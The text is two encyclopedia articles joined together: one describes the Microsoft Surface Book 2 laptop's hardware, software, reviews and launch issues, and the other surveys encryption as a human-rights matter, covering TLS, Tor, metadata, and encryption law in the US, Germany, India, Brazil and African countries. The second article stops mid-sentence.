The Surface Book 2 is the second generation of the Surface Book, part of the Microsoft Surface line of personal computers. It is a 2-in-1 PC which can be used like a conventional laptop, or the screen can be detached and used separately as a tablet, with touch and stylus input. In addition to the 13.5-inch screen available in the original Surface Book introduced two years before, it is also available in a 15-inch screen model. It was released in November 2017, and replaced in Microsoft's product line by the Surface Book 3 in May 2020. Features Hardware The Surface Book 2 features a full-body magnesium alloy construction. The device comes in two distinct portions: a tablet that contains the CPU, storage, wireless connectivity and touchscreen, and a hardware keyboard base that contains a high-performance mobile GPU, supported by its own active cooling system. The device contains two USB 3.0 Gen-1 ports, a USB-C port, 3.5 mm headphone jack, full-sized SD card slot, and two Surface Connect ports (one of which is always occupied by the keyboard base for communication between the two hardware portions, unless the tablet is detached from the base). The front-facing camera contains an infrared sensor that supports login using Windows Hello. From a hardware perspective, this device marks Microsoft's first time to provide USB-C natively in any Surface device, also supporting USB-C Power Delivery. It was the only Surface computer equipped with USB-C until Microsoft's introduction of the Surface Go, in August 2018. Software Surface Book 2 models ship with a pre-installed 64-bit version of Windows 10 Pro and a 30-day trial of Microsoft Office 365. Windows 10 comes pre-installed with Mail, Calendar, People, Xbox (app), Photos, Movies and TV, Groove, and Microsoft Edge. With Windows 10 the Tablet mode is available when the base is detached from the device. In this mode, all windows are opened full-screen and the interface becomes more touch-centric. Accessories The Surface Book 2 is backward-compatible with all accessories of its direct predecessors, such as the Surface Dock, Surface Dial and Surface Pen. The device's native pen computing capabilities are based on N-trig technology Microsoft acquired in 2015, but major improvements were made to reduce input latency, add tilt support, and capture up to 4096 levels of pressure sensitivity. Following the device's general public launch, Microsoft has also published a series of software updates that further improved the device's palm rejection and pen computing accuracy. Reception The Surface Book 2 received broadly positive reviews, often compared favorably to Apple's MacBook Pro lineup. Most reviews applauded the Surface Book 2's keyboard for offering a class-leading 1.55 mm of key travel, significant performance improvement, well-controlled thermals, and new hinge - now redesigned and built as one singular component that increased device rigidity, improved overall docking reliability, and reduced screen wobble. Other improvements include an improved IR camera that activates faster and supports enhanced anti-spoofing Windows Hello facial recognition, a faster solid-state drive with full drive encryption from first-boot, a built-in TPM chip, and two new cooling systems (for the CPU and GPU) that produce less high-pitched noise. The finger scoop has also been reshaped to avoid breaking the glass screen when the lid is being closed, which is a problem its predecessor suffered. Devindra Hardawar of Engadget said of the 15-inch model, "The Surface Book 2 is exactly what we've wanted from a high-end Microsoft laptop. It's powerful, sturdy and its unique hinge doesn't come with any compromises." Hardawar also directly compared the Surface Book 2 to Apple's Macbook Pro saying, "It's the closest a PC maker has come to taking on the MacBook Pro, both in style and substance." Tom Warren, of The Verge, also gave the Surface Book 2 positive notice, praising its performance, keyboard, and touchpad. He did, however, express reservations about the hardware design being largely unchanged, noting "I’d still like to see Microsoft refine the design more to address the hinge and screen wobble fully, and pack in a better power supply. It’s surprising to see the same design after two years, and I was expecting bigger refinements and changes." Issues The Surface Book 2 faced a number of early production issues when it was first launched in November 2017, including defective operating system images, split key caps, misaligned hinges, overuse of adhesives surrounding the tablet screen, and coil whine when under load. Most issues were gradually resolved as production continued. One issue that remains unfixed, however, is battery drain during high intensity workloads. When the 15-inch Surface Book 2 is set to "Best Performance" in the Windows 10 operating system power settings, specific scenarios like extensive gaming or video transcoding could lead to high usage across both the CPU and GPU, and cause the device to draw over 105 W of power. This would unavoidably lead to battery drain until depletion. This issue first appeared in review units shipped to reviewers and other outlets, all of which were accompanied with official 95-watt power supplies. References External links Microsoft Surface Tablet computers introduced in 2017 2-in-1 PCs
55604987
https://en.wikipedia.org/wiki/Human%20rights%20and%20encryption
Human rights and encryption
Human rights applied to encryption is an important concept for freedom of expression as encryption is a technical resource in the implementation of basic human rights. With the evolution of the digital age, the application of freedom of speech becomes more controversial as new means of communication and restrictions arise including government control or commercial methods putting personal information in danger. From a human rights perspective, there is a growing awareness that encryption is an important piece of the puzzle for realizing a free, open and trustworthy Internet. Human rights are moral principles or norms that describe certain standards of human behavior, and are regularly protected as legal rights in municipal and international law. They are commonly understood as inalienable fundamental rights "to which a person is inherently entitled simply because she or he is a human being", and which are "inherent in all human beings" regardless of their nation, location, language, religion, ethnic origin or any other status. They are applicable everywhere and at every time in the sense of being universal, and they are egalitarian in the sense of being the same for everyone. Cryptography is a long-standing subject in the field of mathematics, computer science and engineering. It can generally be defined as "the protection of information and computation using mathematical techniques." In the OECD Guidelines, Encryption and cryptography are defined as follows: "Encryption" means the transformation of data by the use of cryptography to produce unintelligible data (encrypted data) to ensure its confidentiality. "Cryptography" means the discipline which embodies principles, means, and methods for the transformation of data to hide its information content, establish its authenticity, prevent its undetected modification, prevent its repudiation, and/or prevent its unauthorized use. encryption and cryptography are often used synonymously, although "cryptographic" has a broader technical meaning. For example, a digital signature is "cryptographic" but arguably it is not technically "encryption". The human rights aspects related to the availability and use of a technology of particular significance for the field of information and communication is recognised in many places. Freedom of expression is recognized as a human right under article 19 of the Universal Declaration of Human Rights and recognized in international human rights law in the International Covenant on Civil and Political Rights (ICCPR). Article 19 of the UDHR states that "everyone shall have the right to hold opinions without interference" and "everyone shall have the right to freedom of expression; this right shall include freedom to seek, receive and impart information and ideas of all kinds, regardless of frontiers, either orally, in writing or in print, in the form of art, or through any other media of his choice". Overview Since the 1970s, the availability of digital computing and the invention of public key cryptography has made encryption more widely available. Previously, strong versions of encryption were the domain of nation state actors. However, since the year 2000, cryptographic techniques have been widely deployed by a variety of actors to ensure personal, commercial and public sector protection of information and communication. Cryptographic techniques are also used to protect anonymity of communicating actors and protecting privacy more generally. The availability and use of encryption continues to lead to complex, important and highly contentious legal policy debates. There are government statements and proposals on the need to curtail such usage and deployment in view of the potential hurdles it could present for access by government agencies. The rise of commercial services offering end-to-end encryption and the calls for restrictions and solutions in view of law enforcement access are pushing towards more and more debates around the use of encryption and the legal status of the deployment of cryptography more generally. Encryption, as defined above, refers to a subset of cryptographic techniques for the protection of information and computation. The normative value of encryption, however, is not fixed but varies with the type of cryptographic method that is used or deployed and for which purposes. Traditionally, encryption (cypher) techniques were used to ensure the confidentiality of communications and prevent access to information and communications by others than intended recipients. Cryptography can also ensure the authenticity of communicating parties and the integrity of communications contents, providing a key ingredient for enabling trust in the digital environment. There is a growing awareness within human rights that encryption plays an important role in realizing a free, open and trustworthy Internet. UN Special Rapporteur on the promotion and protection of the right to freedom of opinion and expression David Kaye observed, during the Human Rights Council in June 2015, that encryption and anonymity deserve a protected status under the rights to privacy and freedom of expression: "Encryption and anonymity, today's leading vehicles for online security, provide individuals with a means to protect their privacy, empowering them to browse, read, develop and share opinions and information without interference and enabling journalists, civil society organizations, members of ethnic or religious groups, those persecuted because of their sexual orientation or gender identity, activists, scholars, artists and others to exercise the rights to freedom of opinion and expression." Encryption in media and communication Two types of encryption in media and communication can be distinguished: Encryption in media and communication could be used as a result of choice of a service provider or deployed by Internet users. Client-side encryption tools and technologies are relevant for marginalized communities, journalists and other online media actors practicing journalism as it becomes a way of protecting their rights. Encryption provided by service providers can prevent unauthorized third party access, but the service provider implementing it would still have access to the relevant user data. End-to-end encryption is an encryption technique that refers to encryption that also prevents service providers themselves from having access to the user's communications. The implementation of these forms of encryption have sparked the most debate since the year 2000. Service provider deployed techniques to prevent unauthorized third-party access Amongst the most widely deployed cryptographic techniques is securing the communications channel between internet users and specific service providers from man-in-the-middle attacks, access by unauthorized third parties. These cryptographic techniques must be run jointly by a user and the service provider to work. This means that they require service providers, such as an online news publisher or a social network, to actively integrate them into service design and implementation. Users cannot deploy these techniques unilaterally; their deployment is contingent on active participation by the service provider. The TLS protocol, which becomes visible to the normal internet user through the HTTPS header, is widely used for securing online commerce, e-government services and health applications as well as devices that make up networked infrastructures, e.g., routers, cameras. However, although the standard has been around since 1990, the wider spread and evolution of the technology has been slow. As with other cryptographic methods and protocols, the practical challenges related to proper, secure and (wider) deployment are significant and have to be considered. Many service providers still do not implement TLS or do not implement it well. In the context of wireless communications, the use of cryptographic techniques that protect communications from third parties are also important. Different standards have been developed to protect wireless communications: 2G, 3G and 4G standards for communication between mobile phones, base stations and base stations controllers; standards to protect communications between mobile devices and wireless routers ('WLAN'); and standards for local computer networks. One common weakness in these designs is that the transmission points of the wireless communication can access all communications e.g., the telecommunications provider. This vulnerability is exacerbated when wireless protocols only authenticate user devices, but not the wireless access point. Whether the data is stored on a device, or on a local server as in the cloud, there is also a distinction between 'at rest'. Given the vulnerability of cellphones to theft for instance, particular attention may be given to limiting service provided access. This does not exclude the situation that the service provider discloses this information to third parties like other commercial entities or governments. The user needs to trust the service provider to act in its interests. The possibility that a service provider is legally compelled to hand over user information or to interfere with particular communications with particular users, remains. Privacy Enhancing Technologies There are services that specifically market themselves with claims not to have access to the content of their users' communication. Service Providers can also take measures that restrict their ability to access information and communication, further increasing the protection of users against access to their information and communications. The integrity of these Privacy Enhancing Technologies (PETs), depends on delicate design decisions as well as the willingness of the service provider to be transparent and accountable. For many of these services, the service provider may offer some additional features (besides the ability to communicate), for example contact list management—meaning that they can observe who is communicating with whom—but take technical measures so that they cannot read the contents of the messages. This has potentially negative implications for users, for instance, since the service provider has to take action to connect users who want to communicate using the service, it will also have the power to prevent users from communicating in the first place. Following the discovery of vulnerabilities, there is a growing awareness that there needs to be more investment in the auditing of widely used code coming out of the free and open software community. The pervasiveness of business models that depend on collection and processing of user data can be an obstacle for adopting cryptographic mechanisms for protecting information at rest. As Bruce Schneier, has stated: "[s]urveillance is the business model of the Internet. This has evolved into a shockingly extensive, robust, and profitable surveillance architecture. You are being tracked pretty much everywhere you go on the Internet, by many companies and data brokers: ten different companies on one site, a dozen on another." Cryptographic methods play a key role in online identity management. Digital credential systems can be used to allow anonymous yet authenticated and accountable transactions between users and service providers, and can be used to build privacy preserving identity management systems. End-user and community-driven encryption and collaborative services The Internet allows end-users to develop applications and uses of the network without having to coordinate with the relevant internet service providers. Many of the available encryption tools are not developed or offered by traditional service providers or organizations but by experts in the free and open software (FOSS) and Internet engineering communities. A major focus of these initiatives is to produce Privacy Enhancing Technologies (PETs) that can be unilaterally or collaboratively deployed by interested users who are ready, willing, and able to look after their own privacy interests when interacting with service providers. These PETs include standalone encryption applications as well as browser add-ons that help maintain the confidentiality of web-based communications or permit anonymous access to online services. Technologies such as keystroke loggers can intercept content as it is entered before encryption is applied, thereby falling short of offering protection. Hacking into information systems and devices to access data at or after the moment of decryption may have the same effect. Multi-party computation (MPC) techniques are an example of Collaboration|collaborative solutions that allow parties, e.g. NGOs with sensitive data, to do data analytics without revealing their datasets to each other. All of these designs leverage encryption to provide privacy and security assurances in the absence of a trustworthy centralized authority. There are many developments in the implementations of crypto-currencies using blockchain protocols. These systems can have many benefits and these protocols can also be useful for novel forms of contracts and electronic attestation, useful aids when legal infrastructure are not readily available. As to the protection of privacy related to payments, it is a common misconception that the cryptographic techniques that are used in Bitcoin ensure anonymous payments. The only protection offered by Bitcoin is pseudonymity. The cryptographic protection of metadata The availability of metadata (the information relating to a user's information and communications behavior) can pose a particular threat to users including information that can be observed by service providers through the provisioning of services: when, how frequently, how long, and with whom users are communicating. Metadata can also be used to track people geographically and can interfere with their ability to communicate anonymously. As noted by the Berkman Center report, metadata is generally not encrypted in ways that make it inaccessible for governments, and accordingly "provides an enormous amount of surveillance data that was unavailable before [internet communication technologies] became widespread." To minimize exposure of meaningful metadata, encryption tools may need to be used in combination with technologies that provide communication anonymity. The Onion Router The Onion Router, most commonly known as Tor, offers the ability to access websites and online services anonymously. Tor requires a community of volunteers to run intermediary proxies which channel a user's communication with a website so that third parties cannot observe who the user is communicating with. Through the use of encryption, each proxy is only aware of part of the communication path meaning that none of the proxies can by itself infer both the user and the website she is visiting. Besides protecting anonymity, Tor is also useful when the user's ISP blocks access to content. This is similar as the protection that can be offered by a VPN. Service providers, such as websites, can block connections that come from the Tor network. Because certain malicious traffic may reach service providers as Tor traffic and because Tor traffic may also interfere with the business models, service providers may have an incentive to do so. This interference can prevent users from using the most effective means to protect their anonymity online. The Tor browser allows users to obfuscate the origin and end-points of their communications when they communicate on the internet. Obfuscation Obfuscation, the automated generation of "fake" signals that are indistinguishable from users' actual online activities, providing users with a noisy "cover" under which their real information and communication behavior remains unobservable. Obfuscation has received more attention as a method to protect users online recently. TrackMeNot is an obfuscation tool for search engine users: the plugin sends fake search queries to the search engine, affecting the ability of the search engine provider to build an accurate profile of the user. Although TrackMeNot and other search obfuscation tools have been found to be vulnerable to certain attacks that allow search engines to distinguish between user-generated and computer-generated queries, further advances in obfuscation are likely to play a positive role in protecting users when disclosure of information is inevitable, as in the case of search or location-based services. Cryptography, law and human rights Restrictions on cryptographic techniques Recent incidents of terrorism have led to further calls for restrictions on encryption. Even though, in the interest of public safety, there are many proposals to interfere with the free deployment of strong encryption, these proposals do not hold against close scientific scrutiny. These proposals side-step a more fundamental point, related to what is at stake for users. More advanced security measures seem necessary for governments, considering the existing threat landscape for users of digital communications and computing. While many governments consider that encryption techniques could present a hurdle in the investigation of crime and the protection of national security, certain countries, such as Germany or the Netherlands have taken a strong position against restrictions on encryption on the Internet. In 2016, the Ministers of the Interior of France and Germany have jointly stated the need to work on solutions for the challenges law enforcement can face as a result of end-to-end encryption, in particular when offered from a foreign jurisdiction. In a joint statement, the European Agency for Network and Information Security (ENISA) and Europol have also taken a stance against the introduction of backdoors in encryption products. In addition, restrictions would have serious detrimental effects on cyber security, trade and e-commerce. Encryption and the law: the broader landscape Privacy and data protection legislation is closely related to the protection of human rights. There are now more than 100 countries with data protection laws. One of the key principles for the fair and lawful processing of personal information regulated by data protection laws is the principle of security. This principle implies that proper security measures are taken to ensure the protection of personal data against unlawful access by others than intended recipients. The European Union General Data Protection Regulation, which was adopted in 2016 and will enter in to force in 2018, contains an advanced set of rules with respect to the security of personal data. Encryption can be a safeguard against personal data breaches for the UN, as it can facilitate the implementation of privacy and data protection by design. Cryptography has also been an essential ingredient for establishing the conditions for e-Commerce over the Internet. The OECD Principles were adopted to ensure that national cryptography policy would not interfere with trade and to ensure the conditions for international developments in e-Commerce. International cryptography policy and human rights The policy debate about encryption has a significant international dimension because of the international nature of the communications networks and the Internet as well as trade, globalization and the national security dimensions. The OECD adopted a Recommendation Concerning Guidelines for Cryptography Policy on March 27, 1997. There are three components to this policy intervention of the OECD, which is primarily aimed at its Member Countries: a recommendation of the OECD Council, Guidelines for Cryptography Policy (as an Annex to the Recommendation) and a Report on Background and Issues of Cryptography Policy to explain the context for the Guidelines and the basic issues involved in the cryptography law and policy debate. The Principle most explicit about the connection to human rights is Principle 5 on the Protection of Privacy and Personal Data: "The fundamental rights of individuals to privacy, including secrecy of communications and protection of personal data, should be respected in national cryptography policies and in the implementation and use of cryptographic methods." UNESCO, after consulting stakeholders, identified encryption as a relevant element for policy on privacy and freedom of expression. The Keystones Report (2015) articulates that "to the extent that our data can be considered representative of ourselves, encryption has a role to play in protecting who we are, and in preventing abuse of user content. It also allows for greater protection of privacy and anonymity in transit by ensuring that the contents (and sometimes also the metadata) of communications are only seen by the intended recipient." The report recognizes "the role that anonymity and encryption can play as enablers of privacy protection and freedom of expression", and proposes that UNESCO facilitate dialogue on these issues. The Necessary and Proportionate Principles developed and adopted by civil society actors stipulates the protection of the integrity of communications systems as one of its 13 principles. The principles themselves do not provide for explicit guidance on specific cryptographic policy issues such as backdoors or restrictions on the deployment of encryption. The guidance that is offered by the OECD principles and the recent positions of the UN Rapporteur on Encryption state the importance of encryption for the protection of human rights. While it does not give a definitive answer to the question of whether a mandate for encryption backdoors is to be considered incompatible with international law, it does point in that direction. Generally, the available guidance at the international level clarifies that when limitations are imposed on encryption, relevant human rights guarantees have to be strictly observed. National level developments in selected countries United States There has been a broad, active and contentious policy debate on encryption in the US since the 1990s beginning with the 'Crypto Wars'. This involved the adoption of the Communications Assistance for Law Enforcement Act (CALEA), containing requirements for telecommunications providers and equipment manufacturers to ensure the possibility of effective wiretapping. It also involved a debate over existing export controls on strong encryption products (considering their classification as munition) and a criminal investigation into cryptographic email software developer and activist Phil Zimmermann. The case was dropped and the general debate resolved after the liberalization of export controls on most commercial products with strong encryption features and the transfer of these items from the U.S.A. Munitions List (USML), administered by the Department of State, to the Commerce Control List (CCL), administered by the Department of Commerce. The USA Department of Commerce maintains some controls over items on the CCL, including registration, technical reviews and reporting obligations, and continues to impose licensing and other requirements for sensitive encryption items and sales of such items to foreign governments. The debate ignited after the Edward Snowden revelations and the well-documented increase in deployed encryption measures by Internet services, device makers and users, as well as a concerted call from the technical community and civil society to increase encryption use and security to address mass surveillance practices. The increased adoption of encryption by the industry has been received critically by certain government actors, the FBI in particular. This led to the widely reported FBI–Apple encryption dispute over the possibility to gain access to information on the iPhone in assistance to law enforcement. In 2016, several bills were introduced in the US Congress that would place new limits encryption under USA law. The USA's legal system promotes and requires security measures to be implemented in the relevant contexts, including cryptographic methods of various kinds, to ensure security in commerce and trade. Relevant laws are the Federal Information Security Modernization Act (FISMA) of 2014, the Gramm-Leach-Bliley Act, the Health Insurance Portability and Accountability Act (HIPAA) and also the Federal Trade Commission Act. These acts contain security requirements and thereby indirectly require or stimulate the use of encryption in certain circumstances. Finally, many state breach notification laws treat encrypted data as a safe harbor by exempting firms that have encrypted data from notice obligations. Constitutional considerations and human rights play a role of significance in the USA debate about the legal treatment of encryption methods. Restrictions on distribution of cryptographic protocols, and the publication of cryptographic methods are considered an interference with the First Amendment, the USA constitutional safeguard protecting freedom of expression. The USA has particularly active and strongly developed civil society actors involved in cryptographic policy and practice. The United States of America is a primary site for cryptology research and engineering, development and implementation of cryptographic service innovations. There is an active community of Non-Governmental Organizations engaged in the national and international debate on encryption policy. The predominant interferences with strong encryption that take place or are being considered take place in the field of national security, law enforcement and Foreign Affairs. In this area and in answering the contentious question of whether and how lawful access to specific communications could be ensured, the US Government has internationally explained its policy as one aiming to ensure that 'responsibly deployed encryption' helps to "secure many aspects of our daily lives, including our private communications and commerce", but also "to ensure that malicious actors can be held to account without weakening our commitment to strong encryption". Germany As part of the global debate on encryption in the late 1990s, a debate also took place in Germany about the need and legitimacy of imposing a general ban on the encryption of communications because of the impact on criminal investigations. There were profound doubts concerning the constitutional legitimacy as well as concerns about negative factual consequences of such a ban. In qualitative terms, a number of fundamental rights are considered to be affected by restrictions on encryption: the secrecy of telecommunications, expressions of the general right of personality and, indirectly, all communicative freedoms that are exercisable over the Internet. The Federal Government set key points in 1999 for the German cryptographic policy which should especially provide confidence in the security of encryption instead of restricting it. Besides the statements of the German Minister of the Interior towards possible future restrictions, Germany aligns with the position of the UN Special Rapporteur David Kaye and adopts policies of non-restriction or comprehensive protection and only adopts restrictions on a case-specific basis. In November 2015 governmental representatives as well as representatives of the private sector signed a "Charter to strengthen the trusted communication "(Charta zur Stärkung der vertrauenswürdigen Kommunikation) together, in which they stated: "We want to be Encryption Site No. 1 in the world". The German Government has also used its foreign policy to promote international privacy standards. In particular, Germany, in a joint effort with Brazil, committed itself in the Human Rights Council for the appointment of an UN Special Rapporteur on Privacy. There are multiple examples of how there have been efforts by the government to implement encryption policy. They range from informal actions, to laws and regulations: The IT Security Act in 2015, the 'De-Mail' law. There are also several sector-specific rules for encryption and information security in Germany, like the Telecommunications Act (TKG). The German Constitutional Court has also provided valuable input for the international legal handling of encryption techniques with the IT basic right, with which, the constitutional court recognizes that parts of one's personality go into IT systems and therefore the applied protection has to travel with it. India There are a number of limitations on the free deployment of encryption by electronic communications services despite the fact that Indian law and policy promotes and requires the implementation of strong encryption as a security measure, such as in banking, ecommerce and by organizations handling sensitive personal information. There is notable legal uncertainty about the precise legal scope of these license requirements and to what extent they could have legal effect on (the use of or deployment of ) services by the end-users of covered services. The encryption debate ignited publicly in India in 2008 after the Government published a draft proposal with a number of envisioned limitations on the use of encryption. The policy, issued under Section 84A of the Indian Information Technology (Amendment) Act, 2008 was short-lived, but worries remain about the lack of safeguards for privacy and freedom of expression that the draft illustrated. In response to the outcry, the Indian government first exempted "mass use encryption products, which are currently being used in web applications, social media sites, and social media applications such as Whatsapp, Facebook, Twitter etc." Soon thereafter, it withdrew the proposed policy and a new policy has not been made public yet. Section 84A of the Indian Information Technology (Amendment) Act, 2008 empowers the government to formulate rules on modes of encryption for the electronic medium. Legal commentators have noted the lack of transparency about what types of encryption use and deployment are permitted and required under Indian law, especially in the field of electronic communications services. Thus, the Central Indian Government has, in theory, a broad exclusive monopoly over electronic communications which includes the privilege to provide telecommunication and Internet services in India. Brazil After the Edward Snowden revelations in 2013, Brazil was at the forefront of a global coalition promoting the right to privacy at the UN and condemning USA mass surveillance. In recent events, Brazil has demonstrated diverse aims when it comes to the use and implementation of encryption. On the one side, the country is a leader in providing a legal framework of rules for the Internet. But it has also taken several measures that may be seen to restrict the dissemination of encryption technology. In 2015, in a process that was open for public comments and discussions, Brazil's legislator drafted a new privacy bill ("proteção de dados pessoais"), which was sent to Brazil's Federal Congress on May 13, 2016 and came into force as Bill 5276 of 2016. It regulates and protects personal data and privacy, including online practices and includes provisions for more secure methods such as encryption on the treatment of personal data. The law also addresses security issues and a duty for companies to report any attacks and security breaches. With the Marco Civil (2014), that introduces principles like neutrality, the Brazilian Civil Rights Framework for the Internet, Brazil was one of the first countries to ever introduce a law, that aims at combining all Internet rules in one bundle. Brazil has a well-established e-government model: The Brazilian Public Key Infrastructure (Infraestrutura de Chaves Públicas Brasileira – ICP-Brasil). Since 2010 ICP-Brasil certificates can be partly integrated in Brazilian IDs, which can then be used for several services like tax revenue service, judicial services or bank related services. In practice, the ICP-Brasil digital certificate acts as a virtual identity that enables secure and unique identification of the author of a message or transaction made in an electronic medium such as the web. Brazilian courts have taken a stance against encryption in private messaging services by repeatedly ordering the blocking of the messaging service WhatsApp. Since it switched to a full end-to-end encryption, the service has been periodically blocked as a result of a court order in an attempt to make the company comply with demands for information. African countries The African (Banjul) Charter on Human and People's Rights, was adopted in the context of the African Union in 1981. A Protocol to the Charter, establishing the African Court on Human and Peoples' Rights was adopted in 1998 and came into effect in 2005. In the area of information policy, the African Union has adopted the African Union Convention on Cyber Security and Personal Data Protection. The provisions on personal data protection in this Convention generally follow the European model for the protection of data privacy and contains a number of provisions on the security of personal data processing. A civil society initiative has adopted a specific African Declaration on Internet Rights and Freedoms "to help shape approaches to Internet policy-making and governance across the continent". Northern Africa Different countries in the North-African region have not seen a significant rise in legal actions aiming at the suppression of encryption in the transformations that started in 2011. Although legislation often dates back to before the transformations, the enforcement has become stricter since then. No difference in the position towards cryptography can be seen between the countries that had successful revolutions and went through regime changes and those that didn't. Tunisia has several laws that limit online anonymity. Articles 9 and 87 of the 2001 Telecommunication Code ban the use of encryption and provide a sanction of up to five years in prison for the unauthorized sale and use of such techniques. In Algeria, users have legally needed authorization for the use of cryptographic technology from the relevant telecommunications authority ARPT (Autorité de Régulation de la Poste et des Télécommunications) since 2012. In Egypt, Article 64 of the 2003 Telecommunication Regulation Law states that the use of encryption devices is prohibited without the written consent of the NTRA, the military, and national security authorities. In Morocco, the import and export of cryptographic technology, be it soft- or hardware, requires a license from the government. The relevant law No. 53-05 (Loi n° 53-05 relative à l'échange électronique de données juridiques) went into effect in December 2007. East Africa There are no specific provisions in effect in countries in the East-African region restricting the use of encryption technology. As in other African countries, the main reason given for State surveillance is the prevention of terroristic attacks. Kenya with its proximity to Somalia, has cited this threat for adopting restrictive actions. The country has recently fast-tracked a Computer and Cybercrime Law, to be adopted in the end of 2016. In Uganda a number of laws and ICT policies have been passed over the past three years, none of them however deal with encryption. In 2016, following the Presidential Elections, the Ugandan government shut down social networks such as Twitter, Facebook and WhatsApp. West Africa West-African countries neither limit the import or export of encryption technology, nor its use, most national and foreign companies still rely on the use of VPNs for their communication. Ghana recently introduced a draft law aiming at intercepting electronic and postal communications of citizens, to aid crime prevention. Section 4(3) of the proposed bill gives the government permission to intercept anyone's communication upon only receiving oral order from a public officer. Recently the Nigerian Communications Commission has drafted a bill regarding Lawful Interception of Communications Regulations. If passed, the bill allows the interception of all communication without judicial oversight or court order and forces mobile phone companies to store voice and data communication for three years. Furthermore, the draft plans to give the National Security Agency a right to ask for a key to decrypt all encrypted communication. Southern Africa Users in South Africa are not prohibited from using encryption. The provision of such technology, however, is strictly regulated by the Electronic Communications and Transactions Act, 2002. Central Africa Countries in Central Africa, like the Democratic Republic of Congo, the Central African Republic, Gabon and Cameroon do not yet have a well-developed legal framework addressing Internet policy issues. The Internet remains a relatively unregulated sphere. Human rights legal framework related to cryptography International instruments While a very broad range of human rights is touched upon by Digital Technologies, the human rights to freedom of expression (Art. 19 International Covenant on Civil and Political Rights [ICCPR]) and the right to private life (Art. 17 ICCPR) are of particular relevance to the protection of cryptographic methods. Unlike the Universal Declaration of Human Rights (UDHR) which is international 'soft law', the ICCPR is a legally binding international treaty. Restrictions on the right to freedom of expression are only permitted under the conditions of Article 19, paragraph 3. Restrictions shall be provided for by law and they shall be necessary (a) for the respect of the rights or reputations of others or (b) for the protection of national security or of public order or of public health or morals. A further possibility for restriction is set out in Art. 20 ICCPR, In the context of limitations on cryptography, restrictions will most often be based on Article 19 (3)(b), i.e. risks for national security and public order. This raises the complex issue of the relation, and distinction, between security of the individual, e.g. from interference with personal electronic communications, and national security. The right to privacy protects against 'arbitrary or unlawful interference' with one's privacy, one's family, one's home and one's correspondence. Additionally, Article 17(1) of the ICCPR protects against 'unlawful attacks' against one's honor and reputation. The scope of Article 17 is broad. Privacy can be understood as the right to control information about one's self. The possibility to live one's life as one sees fit, within the boundaries set by the law, effectively depends on the information which others have about us and use to inform their behavior towards us. That is part of the core justification for protecting privacy as a human right. In addition to the duty to not infringe these rights, States have a positive obligation to effectively ensure the enjoyment of freedom of expression and privacy of every individual under their jurisdiction. These rights may conflict with other rights and interests, such as dignity, equality or life and security of an individual or legitimate public interests. In these cases, the integrity of each right or value must be maintained to the maximum extent, and any limitations required for balancing have to be in law, necessary and proportionate (especially least restrictive) in view of a legitimate aim (such as the rights of others, public morals and national security). Guaranteeing "uninhibited communications" Encryption supports this mode of communication by allowing people to protect the integrity, availability and confidentiality of their communications. The requirement of uninhibited communications is an important precondition for freedom of communication, which is acknowledged by constitutional courts e.g. US Supreme Court and the German Bundesverfassungsgericht as well as the European Court of Human Rights. More specifically, meaningful communication requires people's ability to freely choose the pieces of information and develop their ideas, the style of language and select the medium of communication according to their personal needs. Uninhibited communication is also a precondition for autonomous personal development. Human beings grow their personality by communicating with others. UN's first Special Rapporteur on Privacy, professor Joe Cannataci, stated that "privacy is not just an enabling right as opposed to being an end in itself, but also an essential right which enables the achievement of an over-arching fundamental right to the free, unhindered development of one's personality". In case such communication is inhibited, the interaction is biased because a statement does not only reflect the speaker's true (innermost) personal views but can be unduly influenced by considerations that should not shape communication in the first place. Therefore, the process of forming one's personality through social interaction is disrupted. In a complex society freedom of speech does not become reality when people have the right to speak. A second level of guarantees need to protect the precondition of making use of the right to express oneself. If there is the risk of surveillance the right to protect one freedom of speech by means of encryption has to be considered as one of those second level rights. Thus, restriction of the availability and effectiveness of encryption as such constitutes an interference with the freedom of expression and the right to privacy as it protects private life and correspondence. Therefore, it has to be assessed in terms of legality, necessity and purpose. Procedures and transparency Freedom of expression and the right to privacy (including the right to private communications) materially protect a certain behavior or a personal state. It is well established in fundamental rights theory that substantive rights have to be complemented by procedural guaranties to be effective. Those procedural guarantees can be rights such as the right to an effective remedy. However, it is important to acknowledge that those procedural rights must, similar to the substantive rights, be accompanied by specific procedural duties of governments without which the rights would erode. The substantial rights have to be construed in a way that they also contain the duty to make governance systems transparent, at least to the extent that allows citizens to assess who made a decision and what measures have been taken. In this aspect, transparency ensures accountability. It is the precondition to know about the dangers for fundamental rights and make use of the respective freedoms. Security intermediaries The effectuation of human rights protection requires the involvement of service providers. These service providers often act as intermediaries facilitating expression and communication of their users of different kinds. In debates about cryptographic policy, the question of lawful government access – and the conditions under which such access should take place in order to respect human rights – has a vertical and national focus. Complexities of jurisdiction in lawful government access are significant and present a still unsolved puzzle. In particular, there has been a dramatic shift from traditional lawful government access to digital communications through the targeting of telecommunications providers with strong local connections, to access through targeting over-the-top services with fewer or loose connections to the jurisdictions in which they offer services to users. In which cases such internationally operating service providers should (be able to) hand over user data and communications to local authorities. The deployment of encryption by service providers is a further complicating factor. From the perspective of service providers, it seems likely that cryptographic methods will have to be designed to account for only providing user data on the basis of valid legal process in certain situations. In recent years, companies and especially online intermediaries have found themselves increasingly in the focus of the debate on the implementation of human rights. Online intermediaries not only have a role of intermediaries between Content Providers and users but also one of "Security Intermediaries" in various aspects. Their practices and defaults as regards encryption are highly relevant to the user's access to and effective usage of those technologies. Since a great amount of data is traveling through their routers and is stored in their clouds, they offer ideal points of access for the intelligence community and non-state actors. Thus, they also, perhaps involuntarily, function as an interface between the state and the users in matters of encryption policy. The role has to be reflected in the human rights debate as well, and it calls for a comprehensive integration of security of user information and communication in the emerging Internet governance model of today. Internet universality Human rights and encryption: obligations and room for action UNESCO is working on promoting the use of legal assessments based on human rights in cases of interference with the freedom to use and deploy cryptographic methods. The concept of Internet Universality, developed by UNESCO, including its emphasis on openness, accessibility to all, and multi-stakeholder participation. While these minimal requirements and good practices can be based on more abstract legal analysis, these assessments have to be made in specific contexts. Secure authenticated access to publicly available content, for instance, is a safeguard against many forms of public and private censorship and limits the risk of falsification. One of the most prevalent technical standards that enables secure authenticated access is TLS. Closely related to this is the availability of anonymous access to information. TOR is a system that allows the practically anonymous retrieval of information online. Both aspects of access to content directly benefit the freedom of thought and expression. The principle of legal certainty is vital to every juridical process that concerns cryptographic methods or practices. The principle is essential to any forms of interception and surveillance, because it can prevent unreasonable fears of surveillance, such as when the underlying legal norms are drafted precisely. Legal certainty may avert chilling effects by reducing an inhibiting key factor for the exercise of human rights, for UNESCO. Continuous innovation in the field ofcryptography and setting and spreading new technical standards is therefore essential. Cryptographic standards can expire quickly as computing power increases . UNESCO has 